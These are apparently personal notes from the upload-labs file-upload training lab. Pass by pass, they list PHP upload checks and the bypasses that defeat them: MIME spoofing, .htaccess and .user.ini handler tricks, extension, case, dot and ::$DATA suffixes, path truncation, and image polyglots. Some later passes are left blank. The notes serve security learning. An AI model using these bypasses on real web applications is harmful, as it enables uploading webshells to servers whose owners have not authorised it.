
	https://www.fujieace.com/penetration-test/upload-labs-pass-01-20.html
	
	https://blog.csdn.net/weixin_44677409/article/details/92799366
	
	https://blog.csdn.net/weixin_44426869/article/details/104236854
	
Pass-01
	<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
		<form enctype="multipart/form-data" method="post" onsubmit="">
		
Pass-02
	if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {}
		Content-Type: application/octet-stream  -> Content-Type: image/jpeg
		
Pass-03
	$deny_ext = array('.asp','.aspx','.php','.jsp');trim();deldot();strtolower();
		AddType application/x-httpd-php .php .phtml .phps .php5 .pht
			1.php5
	
Pass-04
	$deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm","......");
		mod_rewrite ; AllowOverride All
			.htaccess
				SetHandler application/x-httpd-php
			1.php999
	
Pass-05
	Server API -> FastCGI
		.user.ini ->   auto_prepend_file=1.gif
			1.gif ->   <?php phpinfo(); ?>
				http://1.117.162.201/upload/Pass-05/index.php/upload/readme.php   data=phpinfo();
			
Pass-06
	!strtolower();
		1.PHP  //虽然上传成功,蚁剑不能解析1.pHp

Pass-07
	!trim();
		"1.php "  //虽然上传成功,蚁剑不能解析1.php 直接未知文件
	
Pass-08
	!deldot();
		1.php.   //虽然上传成功,蚁剑不能解析1.php.直接未知文件
		
Pass-09
	!str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
		1.php::$DATA
		
Pass-10
	$img_path = UPLOAD_PATH.'/'.$file_name;
		1.php. .
		
Pass-11
	$file_name = str_ireplace($deny_ext,"", $file_name);
		1.phphpp

Pass-12
	$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
		php<5.3.4  magic_quotes_gpc off 
			POST /upload/Pass-12/index.php?save_path=../upload/1.php HTTP/1.1
	
Pass-13
	$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
		php<5.3.4  magic_quotes_gpc off 
			Content-Disposition: form-data; name="save_path"   ../upload/1.php
				Hex
				
Pass-14
	$strInfo = @unpack("C2chars", fread(fopen($filename, "rb"), 2););    
		copy 1.jpg/b + 1.jpg/a 2.jpg
	
Pass-15
	$info = getimagesize($filename);
	
Pass-16
	$image_type = exif_imagetype($filename);
	
Pass-17
	imagecreatefromgif(string $filename)
	
Pass-18
	if(move_uploaded_file($temp_file, $upload_file)){}
	
Pass-19
Pass-20
Pass-21

